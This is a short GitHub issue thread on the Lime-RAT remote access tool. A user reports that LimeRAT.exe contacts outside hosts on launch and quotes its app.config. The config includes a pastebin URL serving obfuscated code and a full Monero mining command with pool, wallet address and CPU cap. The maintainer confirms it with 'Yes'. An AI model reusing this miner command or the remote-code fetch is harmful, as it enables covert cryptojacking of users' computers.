### ISSUE TITLE
Connections and code

### ISSUE THREAD

**Issue by syee47** [NYAN-x-CAT/Lime-RAT#80]
Client makes these connections and then closes upon launching LimeRAT.exe
LimeRAT.exe	80	http	131.186.113					
LimeRAT.exe	443	https 104.20.209.21

app.config contains 
`<Lime_RAT.My.MySettings>
            <setting name="pastebin" serializeAs="String">
                <value>https://pastebin.com/raw/DDTVwwbu</value>
            </setting>`
https://pastebin.com/raw/DDTVwwbu contains obfuscated code.

Also in app.config
`<setting name="xmrcustom" serializeAs="String">
                <value>-B --donate-level=0 -a cryptonight --url=gulf.moneroocean.stream:80 -u 49H8Kbf15JFN2diG5evGHA5G49qhgFBuDid86z3MKxTv59dcqySCzFWUL3SgsEk2SufzTziHp3UE5P8BatwuyFuv1bBKQw2 -p x -R --variant=-1 --max-cpu-usage=75</value>
            </setting>`

**Comment by NYAN-x-CAT** [comment]
Yes
